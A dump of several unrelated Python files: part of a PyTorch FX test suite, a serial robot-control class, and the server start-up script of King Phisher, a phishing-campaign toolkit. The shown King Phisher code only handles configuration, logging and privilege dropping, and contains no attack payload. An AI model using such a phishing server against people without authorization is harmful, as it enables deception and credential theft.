Don't do that if callable(val): return f'<function {val.__name__}>' return str(val) if v.default is not inspect.Signature.empty: default_val_str = default_val_str(v.default) if not isinstance(v.default, str) else f"'{v.default}'" maybe_default = f' = {default_val_str}' else: maybe_default = '' maybe_stars = '' if v.kind == inspect.Parameter.VAR_POSITIONAL: maybe_stars = '*' elif v.kind == inspect.Parameter.VAR_KEYWORD: maybe_stars = '**' arg_strs.append(f'{maybe_stars}{k}{maybe_type_annotation}{maybe_default}') return_annot = f' -> {self._annotation_type_to_stable_str(signature.return_annotation, sig_str)}'\ if signature.return_annotation is not inspect.Signature.empty else '' return f'{fn_name}({", ".join(arg_strs)}){return_annot}' def _annotation_type_to_stable_str(self, t, sig_str): if t is inspect.Signature.empty: return '' # Forward ref if isinstance(t, str): return f"'{t}'" if hasattr(typing, 'ForwardRef') and isinstance(t, typing.ForwardRef): return t.__forward_arg__ if hasattr(typing, '_ForwardRef') and isinstance(t, typing._ForwardRef): return t.__forward_arg__ trivial_mappings = { str : 'str', int : 'int', float: 'float', bool: 'bool', torch.dtype: 'torch.dtype', torch.Tensor: 'torch.Tensor', torch.device: 'torch.device', torch.memory_format: 'torch.memory_format', slice: 'slice', torch.nn.Module: 'torch.nn.modules.module.Module', torch.fx.Graph : 'torch.fx.graph.Graph', torch.fx.Node : 'torch.fx.node.Node', torch.fx.Proxy : 'torch.fx.proxy.Proxy', torch.fx.node.Target : 'torch.fx.node.Target', torch.fx.node.Argument : 'torch.fx.node.Argument', torch.fx.graph.PythonCode : 'torch.fx.graph.PythonCode', torch.fx.graph_module.GraphModule: 'torch.fx.graph_module.GraphModule', torch.fx.subgraph_rewriter.Match: 'torch.fx.subgraph_rewriter.Match', Ellipsis : '...', typing.Any: 'Any', type(None): 'NoneType', None: 'None', typing.Iterator: 'Iterator', } mapping = trivial_mappings.get(t, None) if mapping: return mapping # Handle types with contained types contained = getattr(t, '__args__', None) or [] # Callables contain a bare List for arguments contained = t if isinstance(t, list) else contained # Python 3.8 puts type vars into __args__ for unbound types such as Dict if all(isinstance(ct, typing.TypeVar) for ct in contained): contained = [] contained_type_annots = [self._annotation_type_to_stable_str(ct, sig_str) for ct in contained] contained_type_str = f'[{", ".join(contained_type_annots)}]' if len(contained_type_annots) > 0 else '' origin = getattr(t, '__origin__', None) if origin is None: # Unbound types don't have `__origin__` in some Python versions, so fix that up here. origin = t if t in {typing.Tuple, typing.Union, typing.Dict, typing.List, typing.Type, typing.Callable} else origin if origin in {tuple, typing.Tuple}: return f'Tuple{contained_type_str}' if origin in {typing.Union}: # Annoying hack to detect Optional if len(contained) == 2 and (contained[0] is type(None)) ^ (contained[1] is type(None)): not_none_param = contained[0] if contained[0] is not type(None) else contained[1] return f'Optional[{self._annotation_type_to_stable_str(not_none_param, sig_str)}]' return f'Union{contained_type_str}' if origin in {dict, typing.Dict}: return f'Dict{contained_type_str}' if origin in {list, typing.List}: return f'List{contained_type_str}' if origin in {type, typing.Type}: return f'Type{contained_type_str}' if isinstance(t, typing.Callable): if len(contained) > 0 and contained[0] is not Ellipsis: return f'Callable[[{", ".join(contained_type_annots[:-1])}], {contained_type_annots[-1]}]' else: return f'Callable{contained_type_str}' raise RuntimeError(f'Unrecognized type {t} used in BC-compatible type signature {sig_str}.' f'Please add support for this type and confirm with the ' f'FX team that your signature change is valid.') def test_function_back_compat(self): """ Test backward compatibility for function signatures with @compatibility(is_backward_compatible=True). Currently this checks for exact signature matches, which may lead to false positives. If this becomes too annoying, we can refine this check to actually parse out the saved schema strings and check if the change is truly backward- incompatible. """ signature_strs = [] for obj in _BACK_COMPAT_OBJECTS: if not isinstance(obj, type): signature_strs.append(self._fn_to_stable_annotation_str(obj)) signature_strs.sort() try: self.assertExpected('\n'.join(signature_strs), 'fx_backcompat_function_signatures') except AssertionError as e: msg = f"{e}\n****** ERROR ******\nAn FX function that has been marked " \ f"as backwards-compatible has experienced a signature change. See the " \ f"above exception context for more information. If this change was " \ f"unintended, please revert it. If it was intended, check with the FX " \ f"team to ensure that the proper deprecation protocols have been followed " \ f"and subsequently --accept the change." raise AssertionError(msg) def test_class_member_back_compat(self): """ Test backward compatibility for members of classes with @compatibility(is_backward_compatible=True). Currently this checks for exact matches on the publicly visible members of the class. """ class_method_strs = [] for obj in _BACK_COMPAT_OBJECTS: if isinstance(obj, type): public_members = [name for name in obj.__dict__ if not name.startswith('_')] class_method_strs.append(f'{torch.typename(obj)} {sorted(public_members)}') class_method_strs.sort() try: self.assertExpected('\n'.join(class_method_strs), 'fx_backcompat_class_members') except AssertionError as e: msg = f"{e}\n****** ERROR ******\nAn FX class that has been marked " \ f"as backwards-compatible has experienced change in its public members. See the " \ f"above exception context for more information. If this change was " \ f"unintended, please revert it. If it was intended, check with the FX " \ f"team to ensure that the proper deprecation protocols have been followed " \ f"and subsequently --accept the change." raise AssertionError(msg) def test_public_api_surface(self): mod = torch.fx non_back_compat_objects = {} def check_symbols_have_bc_designation(m, prefix): if not m.__name__.startswith('torch.fx'): return if m.__name__.startswith('torch.fx.experimental'): return for k, v in m.__dict__.items(): if v is m: continue if k.startswith('_'): continue if isinstance(v, types.ModuleType): check_symbols_have_bc_designation(v, prefix + [k]) elif isinstance(v, type) or isinstance(v, types.FunctionType): if v not in _MARKED_WITH_COMATIBLITY: non_back_compat_objects.setdefault(v) check_symbols_have_bc_designation(mod, ['torch', 'fx']) non_back_compat_strs = [torch.typename(obj) for obj in non_back_compat_objects.keys()] # Only want objects in torch.fx non_back_compat_strs = [ s for s in non_back_compat_strs if s.startswith('torch.fx') and not s.startswith('torch.fx.experimental')] # Only want objects in public namespaces non_back_compat_strs = [ s for s in non_back_compat_strs if all(not atom.startswith('_') for atom in s.split('.'))] non_back_compat_strs.sort() if len(non_back_compat_strs) != 0: raise AssertionError(f"Public FX API(s) {non_back_compat_strs} introduced but not given a " f"backwards-compatibility classification! Please decorate these " f"API(s) with `@torch.fx._compatibility.compatibility` to specify " f"BC guarantees.") class TestFunctionalTracing(JitTestCase): def setUp(self): # Checking for mutable operations whil tracing is feature flagged # Enable it in testing but not by default self.orig_tracer_mutable_flag = torch.fx.proxy.TracerBase.check_mutable_operations torch.fx.proxy.TracerBase.check_mutable_operations = True def tearDown(self): torch.fx.proxy.TracerBase.check_mutable_operations = self.orig_tracer_mutable_flag IGNORE_FUNCS = ("has_torch_function", "has_torch_function_unary", "has_torch_function_variadic", "handle_torch_function", "boolean_dispatch") TO_PATCH = {"has_torch_function": None, "has_torch_function_unary": None, "has_torch_function_variadic": None} BUILT_IN_FUNC = (AssertionError, "") PROXY_ITERABLE = (TypeError, r"argument of type 'Proxy' is not iterable") PROXY_ITERATED = (TraceError, r"Proxy object cannot be iterated") LEN_ERROR = (RuntimeError, r"'len' is not supported in symbolic tracing by default") ARG_TYPE_MISMATCH = (TypeError, r", not Proxy$") CONTROL_FLOW = (TraceError, r"symbolically traced variables cannot be used as inputs to control flow") INTERPOLATE_ARGS_CONFLICT = (ValueError, r"only one of size or scale_factor should be defined") MUTABLE = (RuntimeError, r"Tried to trace mutable operation") UNTRACEABLE_FUNCTIONALS = { "adaptive_avg_pool1d": BUILT_IN_FUNC, "avg_pool1d": BUILT_IN_FUNC, "avg_pool2d": BUILT_IN_FUNC, "avg_pool3d": BUILT_IN_FUNC, "celu_": BUILT_IN_FUNC, "channel_shuffle": BUILT_IN_FUNC, "conv1d": BUILT_IN_FUNC, "conv2d": BUILT_IN_FUNC, "conv3d": BUILT_IN_FUNC, "conv_tbc": BUILT_IN_FUNC, "conv_transpose1d": BUILT_IN_FUNC, "conv_transpose2d": BUILT_IN_FUNC, "conv_transpose3d": BUILT_IN_FUNC, "cosine_similarity": BUILT_IN_FUNC, "elu_": BUILT_IN_FUNC, "hardtanh_": BUILT_IN_FUNC, "leaky_relu_": BUILT_IN_FUNC, "logsigmoid": BUILT_IN_FUNC, "one_hot": BUILT_IN_FUNC, "pdist": BUILT_IN_FUNC, "pixel_shuffle": BUILT_IN_FUNC, "pixel_unshuffle": BUILT_IN_FUNC, "relu_": BUILT_IN_FUNC, "rrelu_": BUILT_IN_FUNC, "selu_": BUILT_IN_FUNC, "softplus": BUILT_IN_FUNC, "softshrink": BUILT_IN_FUNC, "threshold_": BUILT_IN_FUNC, "adaptive_avg_pool2d": LEN_ERROR, "adaptive_avg_pool3d": LEN_ERROR, "adaptive_max_pool2d_with_indices": LEN_ERROR, "adaptive_max_pool3d_with_indices": LEN_ERROR, "instance_norm": CONTROL_FLOW, "pad": LEN_ERROR, "adaptive_max_pool1d": PROXY_ITERABLE, "adaptive_max_pool2d": PROXY_ITERABLE, "adaptive_max_pool3d": PROXY_ITERABLE, "fractional_max_pool2d": PROXY_ITERABLE, "fractional_max_pool3d": PROXY_ITERABLE, "max_pool1d": PROXY_ITERABLE, "max_pool2d": PROXY_ITERABLE, "max_pool3d": PROXY_ITERABLE, "group_norm": PROXY_ITERATED, "lp_pool2d": PROXY_ITERATED, "max_unpool1d": PROXY_ITERATED, "max_unpool2d": PROXY_ITERATED, "max_unpool3d": PROXY_ITERATED, "adaptive_max_pool1d_with_indices": ARG_TYPE_MISMATCH, "fractional_max_pool2d_with_indices": ARG_TYPE_MISMATCH, "fractional_max_pool3d_with_indices": ARG_TYPE_MISMATCH, "hardshrink": ARG_TYPE_MISMATCH, "layer_norm": ARG_TYPE_MISMATCH, "lp_pool1d": ARG_TYPE_MISMATCH, "max_pool1d_with_indices": ARG_TYPE_MISMATCH, "max_pool2d_with_indices": ARG_TYPE_MISMATCH, "max_pool3d_with_indices": ARG_TYPE_MISMATCH, "pairwise_distance": ARG_TYPE_MISMATCH, "affine_grid": CONTROL_FLOW, "alpha_dropout": CONTROL_FLOW, "batch_norm": CONTROL_FLOW, "binary_cross_entropy": CONTROL_FLOW, "binary_cross_entropy_with_logits": CONTROL_FLOW, "celu": CONTROL_FLOW, "cosine_embedding_loss": CONTROL_FLOW, "cross_entropy": CONTROL_FLOW, "ctc_loss": CONTROL_FLOW, "dropout": CONTROL_FLOW, "dropout2d": CONTROL_FLOW, "dropout3d": CONTROL_FLOW, "elu": CONTROL_FLOW, "embedding": CONTROL_FLOW, "embedding_bag": CONTROL_FLOW, "feature_alpha_dropout": CONTROL_FLOW, "fold": CONTROL_FLOW, "gaussian_nll_loss": CONTROL_FLOW, "glu": CONTROL_FLOW, "grid_sample": CONTROL_FLOW, "gumbel_softmax": CONTROL_FLOW, "hardsigmoid": CONTROL_FLOW, "hardswish": CONTROL_FLOW, "hardtanh": CONTROL_FLOW, "hinge_embedding_loss": CONTROL_FLOW, "huber_loss": CONTROL_FLOW, "interpolate": CONTROL_FLOW, "kl_div": CONTROL_FLOW, "l1_loss": CONTROL_FLOW, "leaky_relu": CONTROL_FLOW, "local_response_norm": CONTROL_FLOW, "margin_ranking_loss": CONTROL_FLOW, "mse_loss": CONTROL_FLOW, "multi_head_attention_forward": CONTROL_FLOW, "multi_margin_loss": CONTROL_FLOW, "multilabel_margin_loss": CONTROL_FLOW, "multilabel_soft_margin_loss": CONTROL_FLOW, "nll_loss": CONTROL_FLOW, "poisson_nll_loss": CONTROL_FLOW, "relu": CONTROL_FLOW, "relu6": CONTROL_FLOW, "rrelu": CONTROL_FLOW, "selu": CONTROL_FLOW, "silu": CONTROL_FLOW, "mish": CONTROL_FLOW, "smooth_l1_loss": CONTROL_FLOW, "soft_margin_loss": CONTROL_FLOW, "threshold": CONTROL_FLOW, "triplet_margin_loss": CONTROL_FLOW, "triplet_margin_with_distance_loss": CONTROL_FLOW, "unfold": CONTROL_FLOW, "upsample": CONTROL_FLOW, "upsample_bilinear": INTERPOLATE_ARGS_CONFLICT, "upsample_nearest": INTERPOLATE_ARGS_CONFLICT, "normalize" : MUTABLE, } # List of nn.functionals with Tensor inputs but not with type annotation FUNCTIONALS_WITHOUT_ANNOTATION = ( "adaptive_max_pool1d", "adaptive_max_pool2d", "adaptive_max_pool3d", "fractional_max_pool2d", "fractional_max_pool3d", "max_pool1d", "max_pool2d", "max_pool3d", "gaussian_nll_loss", "upsample", "upsample_bilinear", "upsample_nearest", ) # Inconsistent behavior between Python 3.8 and other Python versions: # - Python 3.8+: Re-raise internal exception like `PROXY_ITERATED` # - Other Python: Raise `argument of type 'Proxy' is not iterable` due to the same # internal exception above # Use the following map to override the expected exception for Python 3.8 UNTRACEABLE_FUNCTIONALS_PY38 = { "adaptive_max_pool1d": PROXY_ITERATED, "adaptive_max_pool2d": PROXY_ITERATED, "adaptive_max_pool3d": PROXY_ITERATED, "fractional_max_pool2d": PROXY_ITERATED, "fractional_max_pool3d": PROXY_ITERATED, "max_pool1d": PROXY_ITERATED, "max_pool2d": PROXY_ITERATED, "max_pool3d": PROXY_ITERATED, "group_norm": LEN_ERROR } @classmethod def _get_functional(cls): functional_list = [] for f in dir(torch.nn.functional): if not f.islower(): continue # Ignore internal functions if f.startswith('_'): continue # Ignore supporting functions if f in cls.IGNORE_FUNCS: continue fn = getattr(torch.nn.functional, f) # Ignore non-callable object like modules if not isinstance(fn, Callable): continue if f not in cls.FUNCTIONALS_WITHOUT_ANNOTATION: try: sig = inspect.signature(fn) has_tensor_arg = False for arg, param in sig.parameters.items(): if isinstance(param.annotation, type) and issubclass(param.annotation, torch.Tensor): has_tensor_arg = True if not has_tensor_arg: continue # No signature or Object is not supported except ValueError: pass functional_list.append((f, fn)) return functional_list @classmethod def generate_test_func(cls, func_name, fn): def functional_test(self): if func_name in self.UNTRACEABLE_FUNCTIONALS_PY38 and \ sys.version_info >= (3, 8) and sys.version_info < (3, 10): exc, err = self.UNTRACEABLE_FUNCTIONALS_PY38[func_name] with self.assertRaisesRegex(exc, err): symbolic_trace(fn) elif func_name in self.UNTRACEABLE_FUNCTIONALS: exc, err = self.UNTRACEABLE_FUNCTIONALS[func_name] with self.assertRaisesRegex(exc, err): symbolic_trace(fn) else: symbolic_trace(fn) return functional_test @classmethod def generate_tests(cls): functional_list = cls._get_functional() for func_name, fn in functional_list: test_name = "test_nn_functional_" + func_name functional_test = cls.generate_test_func(func_name, fn) setattr(cls, test_name, functional_test) @classmethod def setUpClass(cls): def no(*args, **kwargs): return False for name in cls.TO_PATCH.keys(): cls.TO_PATCH[name] = getattr(torch.nn.functional, name) setattr(torch.nn.functional, name, no) @classmethod def tearDownClass(cls): for name in cls.TO_PATCH.keys(): setattr(torch.nn.functional, name, cls.TO_PATCH[name]) TestFunctionalTracing.generate_tests() instantiate_device_type_tests(TestOperatorSignatures, globals()) @skipIfNoTorchVision class TestVisionTracing(JitTestCase): def setUp(self): # Checking for mutable operations whil tracing is feature flagged # Enable it in testing but not by default self.orig_tracer_mutable_flag = torch.fx.proxy.TracerBase.check_mutable_operations torch.fx.proxy.TracerBase.check_mutable_operations = True def tearDown(self): torch.fx.proxy.TracerBase.check_mutable_operations = self.orig_tracer_mutable_flag PROXY_ITERATED = (TraceError, r"Proxy object cannot be iterated") INCONSISTENT_TYPE = ( RuntimeError, r"Return value was annotated as having type __torch__.torchvision.models[.\w]+ but is actually of type Tensor" ) UNTRACEABLE_MODELS = { "fasterrcnn_resnet50_fpn": PROXY_ITERATED, "fasterrcnn_mobilenet_v3_large_320_fpn": PROXY_ITERATED, "fasterrcnn_mobilenet_v3_large_fpn": PROXY_ITERATED, "maskrcnn_resnet50_fpn": PROXY_ITERATED, "keypointrcnn_resnet50_fpn": PROXY_ITERATED, "retinanet_resnet50_fpn": PROXY_ITERATED, } UNSCRIPTABLE_MODELS = { "googlenet": INCONSISTENT_TYPE, "inception_v3": INCONSISTENT_TYPE, } output_transform = { "fcn_resnet50": lambda x: x["out"], "fcn_resnet101": lambda x: x["out"], "deeplabv3_resnet50": lambda x: x["out"], "deeplabv3_resnet101": lambda x: x["out"], "deeplabv3_mobilenet_v3_large": lambda x: x["out"], "lraspp_mobilenet_v3_large": lambda x: x["out"], "fasterrcnn_resnet50_fpn": lambda x: x[1], "fasterrcnn_mobilenet_v3_large_fpn": lambda x: x[1], "fasterrcnn_mobilenet_v3_large_320_fpn": lambda x: x[1], "maskrcnn_resnet50_fpn": lambda x: x[1], "keypointrcnn_resnet50_fpn": lambda x: x[1], "retinanet_resnet50_fpn": lambda x: x[1], } @classmethod def generate_test_fn(cls, name, model_fn, x, kwargs): def run_test(self): model = model_fn(**kwargs) model = model.eval() if name in self.UNTRACEABLE_MODELS: err, exc = self.UNTRACEABLE_MODELS[name] with self.assertRaisesRegex(err, exc): graph = symbolic_trace(model) else: out_transform = self.output_transform.get(name, lambda x: x) graph : torch.fx.GraphModule = symbolic_trace(model) a = out_transform(model(x)) b = out_transform(graph(x)) self.assertEqual(a, b) if name in self.UNSCRIPTABLE_MODELS: err, exc = self.UNSCRIPTABLE_MODELS[name] with self.assertRaisesRegex(err, exc): script = torch.jit.script(graph) else: script = torch.jit.script(graph) c = out_transform(script(x)) self.assertEqual(a, c) return run_test @classmethod def generate_classification_tests(cls): for k, v in torchvision_models.__dict__.items(): if callable(v) and k[0].lower() == k[0] and k[0] != "_": test_name = 'test_torchvision_models_' + k x = torch.rand(1, 3, 299, 299) if k in ['inception_v3'] else torch.rand(1, 3, 224, 224) kwargs = dict(num_classes=50) model_test = cls.generate_test_fn(k, v, x, kwargs) setattr(cls, test_name, model_test) @classmethod def generate_segmentation_tests(cls): for k, v in torchvision_models.segmentation.__dict__.items(): if callable(v) and k[0].lower() == k[0] and k[0] != "_": test_name = 'test_torchvision_models_segmentation_' + k x = torch.rand(1, 3, 32, 32) kwargs = dict(num_classes=10, pretrained_backbone=False) model_test = cls.generate_test_fn(k, v, x, kwargs) setattr(cls, test_name, model_test) @classmethod def generate_detection_tests(cls): for k, v in torchvision_models.detection.__dict__.items(): if callable(v) and k[0].lower() == k[0] and k[0] != "_": test_name = 'test_torchvision_models_detection_' + k x = [torch.rand(3, 300, 300)] kwargs = dict(num_classes=10, pretrained_backbone=False) model_test = cls.generate_test_fn(k, v, x, kwargs) setattr(cls, test_name, model_test) @classmethod def generate_video_tests(cls): for k, v in torchvision_models.video.__dict__.items(): if callable(v) and k[0].lower() == k[0] and k[0] != "_": test_name = 'test_torchvision_models_video_' + k x = torch.rand(1, 3, 4, 112, 112) kwargs = dict(num_classes=50) model_test = cls.generate_test_fn(k, v, x, kwargs) setattr(cls, test_name, model_test) @classmethod def generate_tests(cls): cls.generate_classification_tests() cls.generate_detection_tests() cls.generate_segmentation_tests() cls.generate_video_tests() if HAS_TORCHVISION: TestVisionTracing.generate_tests() if __name__ == '__main__': run_tests()
robot.py
from transport import Transport from protocol import * import threading from config import* from messages import* from time import time as now, sleep import yaml class RobotStatus: def __init__(self, num_joints): self.current_joint_positions = JointPos().resize(num_joints) class Robot: def __init__(self): self.name = None self.__protocol = Protocol() self.__shutdown = False self.__initialized = False self.__configured = False self.__waiting_for = None def configure(self, name, port, baudrate): self.name = name try: config_file = 'config/'+self.name+'.yaml' with open(config_file) as f: conf = yaml.safe_load(f) f.close() self.__port = port self.__baudrate = baudrate self.__num_joints = len(conf['Joints']) except: print("[Error] Configuration failed. \n ***** Please make sure " + self.name + ".yaml exists.") return False self.__configured = True return True def initialize(self): if not self.__configured: print('[Error] Robot has not been configured.') return False try: self.__transport = Transport(self.__port, self.__baudrate) except: print("[Error] Serial initialization failed. \n ***** Check serial settings.") return False self.__proc = threading.Thread(name='robot process', target=self.__run) self.__proc.setDaemon(True) self.robot_status = RobotStatus(self.__num_joints) self.__initialized = True return True def start(self): if not self.__initialized: print("Error: Robot has not been initialized.") return self.__proc.start() def shutdown(self): self.__shutdown = True # set shutdown flag def get_joint_angles(self): self.__set_wait(MsgId.RET_JOINT_POSITIONS) self.__transport.write(self.__protocol.encode(MsgId.GET_JOINT_POSITIONS, Empty())) if self.__wait(): return self.robot_status.current_joint_positions.angles else: return False def set_joint_angles(self, angles): print("setting joint angles at ", angles) msg = JointPos().resize(self.__num_joints) for i in range(self.__num_joints): msg.angles[i] = angles[i] self.__transport.write(self.__protocol.encode(MsgId.SET_JOINT_POSITIONS, msg)) def __run(self): while not self.__shutdown: c = self.__transport.read() # print(c) if self.__protocol.parse(c): self.__process_message(self.__protocol.get_message()) def __process_message(self, msg_id): if msg_id == MsgId.MOVE_DONE: pass elif msg_id == MsgId.RET_JOINT_POSITIONS: self.__protocol.decode(msg_id, self.robot_status.current_joint_positions) if self.__waiting_for == MsgId.RET_JOINT_POSITIONS: self.__waiting_for = None def __set_wait(self, msg_id): self.__waiting_for = msg_id def __wait(self, timeout=0.5): _timeout = now()+timeout while now() < _timeout: if self.__waiting_for is None: return True return False
__main__.py
# -*- coding: utf-8 -*- # # king_phisher/server/__main__.py # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are # met: # # * Redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer. # * Redistributions in binary form must reproduce the above # copyright notice, this list of conditions and the following disclaimer # in the documentation and/or other materials provided with the # distribution. # * Neither the name of the project nor the names of its # contributors may be used to endorse or promote products derived from # this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS # "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT # LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR # A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT # OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, # SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT # LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, # DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY # THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT # (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. # # pylint: disable=too-many-locals import argparse import functools import logging import os import signal import sys import threading from king_phisher import startup from king_phisher import color from king_phisher import constants from king_phisher import errors from king_phisher import find from king_phisher import geoip from king_phisher import utilities from king_phisher import version from king_phisher.server import build from king_phisher.server import configuration from king_phisher.server import fs_utilities from king_phisher.server import plugins from king_phisher.server import pylibc from boltons import strutils logger = logging.getLogger('KingPhisher.Server.CLI') def sig_handler(server, name, number, frame): signal.signal(signal.SIGINT, signal.SIG_IGN) signal.signal(signal.SIGTERM, signal.SIG_IGN) logger.info("received signal {0}, shutting down the server".format(name)) threading.Thread(target=server.shutdown).start() def build_and_run(arguments, config, plugin_manager, log_file=None): # fork into the background should_fork = True if arguments.foreground: should_fork = False elif config.has_option('server.fork'): should_fork = bool(config.get('server.fork')) if should_fork: if os.fork(): return sys.exit(os.EX_OK) os.setsid() try: king_phisher_server = build.server_from_config(config, plugin_manager=plugin_manager) except errors.KingPhisherDatabaseAuthenticationError: logger.critical('failed to authenticate to the database, this usually means the password is incorrect and needs to be updated') return os.EX_SOFTWARE except errors.KingPhisherError as error: logger.critical('server failed to build with error: ' + error.message) return os.EX_SOFTWARE server_pid = os.getpid() logger.info("server running in process: {0} main tid: 0x{1:x}".format(server_pid, threading.current_thread().ident)) if should_fork and config.has_option('server.pid_file'): pid_file = open(config.get('server.pid_file'), 'w') pid_file.write(str(server_pid)) pid_file.close() if config.has_option('server.setuid_username'): setuid_username = config.get('server.setuid_username') try: passwd = pylibc.getpwnam(setuid_username) except KeyError: logger.critical('an invalid username was specified as \'server.setuid_username\'') king_phisher_server.shutdown() return os.EX_NOUSER if log_file is not None: fs_utilities.chown(log_file, user=passwd.pw_uid, group=passwd.pw_gid, recursive=False) data_path = config.get_if_exists('server.letsencrypt.data_path') if data_path and config.get_if_exists('server.letsencrypt.chown_data_path', True): if os.path.isdir(data_path): fs_utilities.chown(data_path, user=passwd.pw_uid, group=passwd.pw_gid, recursive=True) else: logger.warning('can not chown the letsencrypt data directory (directory not found)') os.setgroups(pylibc.getgrouplist(setuid_username)) os.setresgid(passwd.pw_gid, passwd.pw_gid, passwd.pw_gid) os.setresuid(passwd.pw_uid, passwd.pw_uid, passwd.pw_uid) logger.info("dropped privileges to the {} account (uid: {}, gid: {})".format(setuid_username, passwd.pw_uid, passwd.pw_gid)) else: logger.warning('running with root privileges is dangerous, drop them by configuring \'server.setuid_username\'') os.umask(0o077) db_engine_url = king_phisher_server.database_engine.url if db_engine_url.drivername == 'sqlite': logger.warning('sqlite is no longer fully supported, see https://github.com/securestate/king-phisher/wiki/Database#sqlite for more details') database_dir = os.path.dirname(db_engine_url.database) if not os.access(database_dir, os.W_OK): logger.critical('sqlite requires write permissions to the folder containing the database') king_phisher_server.shutdown() return os.EX_NOPERM signal.signal(signal.SIGHUP, functools.partial(sig_handler, king_phisher_server, 'SIGHUP')) signal.signal(signal.SIGINT, functools.partial(sig_handler, king_phisher_server, 'SIGINT')) signal.signal(signal.SIGTERM, functools.partial(sig_handler, king_phisher_server, 'SIGTERM')) try: king_phisher_server.serve_forever(fork=False) except KeyboardInterrupt: pass king_phisher_server.shutdown() return os.EX_OK def _ex_config_logging(arguments, config, console_handler): """ If a setting is configured improperly, this will terminate execution via :py:func:`sys.exit`. :return: The path to a log file if one is in use. :rtype: str """ default_log_level = min( getattr(logging, (arguments.loglvl or constants.DEFAULT_LOG_LEVEL)), getattr(logging, config.get_if_exists('logging.level', 'critical').upper()) ) log_levels = ('DEBUG', 'INFO', 'WARNING', 'ERROR', 'FATAL') file_path = None if config.has_option('logging.file'): options = config.get('logging.file') for _ in range(1): default_format = '%(asctime)s %(name)-50s %(levelname)-8s %(message)s' if isinstance(options, dict): # new style if not options.get('enabled', True): break if 'path' not in options: color.print_error('logging.file is missing required key \'path\'') sys.exit(os.EX_CONFIG) if 'level' not in options: color.print_error('logging.file is missing required key \'level\'') sys.exit(os.EX_CONFIG) file_path = options['path'] formatter = logging.Formatter(options.get('format', default_format)) if not options['level'].upper() in log_levels: color.print_error('logging.file.level is invalid, must be one of: ' + ', '.join(log_levels)) sys.exit(os.EX_CONFIG) log_level = getattr(logging, options['level'].upper()) root = options.get('root', '') elif isinstance(options, str): # old style file_path = options formatter = logging.Formatter(default_format) log_level = default_log_level root = '' else: break file_handler = logging.FileHandler(file_path) file_handler.setFormatter(formatter) logging.getLogger(root).addHandler(file_handler) file_handler.setLevel(log_level) if config.has_option('logging.console'): options = config.get('logging.console') for _ in range(1): if isinstance(options, dict): # new style if not options.get('enabled', True): break if 'format' in options: console_handler.setFormatter(color.ColoredLogFormatter(options['format'])) if arguments.loglvl is None and 'level' in options: log_level = str(options.get('level', '')).upper() if log_level not in log_levels: color.print_error('logging.console.level is invalid, must be one of: ' + ', '.join(log_levels)) sys.exit(os.EX_CONFIG) console_handler.setLevel(getattr(logging, log_level)) elif isinstance(options, str): # old style console_handler.setLevel(default_log_level) return file_path def main(): parser = argparse.ArgumentParser(prog='KingPhisherServer', description='King Phisher Server', conflict_handler='resolve') utilities.argp_add_args(parser) startup.argp_add_server(parser) arguments = parser.parse_args() # basic runtime checks if sys.version_info < (3, 4): color.print_error('the python version is too old (minimum required is 3.4)') return 0 console_log_handler = utilities.configure_stream_logger(arguments.logger, arguments.loglvl) del parser # configure environment variables and load the config find.init_data_path('server') if not os.path.exists(arguments.config_file): color.print_error('invalid configuration file') color.print_error('the specified path does not exist') return os.EX_NOINPUT if not os.path.isfile(arguments.config_file): color.print_error('invalid configuration file') color.print_error('the specified path is not a file') return os.EX_NOINPUT if not os.access(arguments.config_file, os.R_OK): color.print_error('invalid configuration file') color.print_error('the specified path can not be read') return os.EX_NOPERM config = configuration.ex_load_config(arguments.config_file) if arguments.verify_config: color.print_good('configuration verification passed') color.print_good('all required settings are present') return os.EX_OK if config.has_option('server.data_path'): find.data_path_append(config.get('server.data_path')) if os.getuid(): color.print_error('the server must be started as root, configure the') color.print_error('\'server.setuid_username\' option in the config file to drop privileges') return os.EX_NOPERM if arguments.update_geoip_db: color.print_status('downloading a new geoip database') try: size = geoip.download_geolite2_city_db(config.get('server.geoip.database')) except errors.KingPhisherResourceError as error: color.print_error(error.message) return os.EX_UNAVAILABLE color.print_good("download complete, file size: {0}".format(strutils.bytes2human(size))) return os.EX_OK # setup logging based on the configuration if config.has_section('logging'): log_file = _ex_config_logging(arguments, config, console_log_handler) logger.debug("king phisher version: {0} python version: {1}.{2}.{3}".format(version.version, sys.version_info[0], sys.version_info[1], sys.version_info[2])) # initialize the plugin manager try: plugin_manager = plugins.ServerPluginManager(config) except errors.KingPhisherError as error: if isinstance(error, errors.KingPhisherPluginError): color.print_error("plugin error: {0} ({1})".format(error.plugin_name, error.message)) else: color.print_error(error.message) return os.EX_SOFTWARE status_code = build_and_run(arguments, config, plugin_manager, log_file) plugin_manager.shutdown() logging.shutdown() return status_code if __name__ == '__main__': sys.exit(main())
decode.py
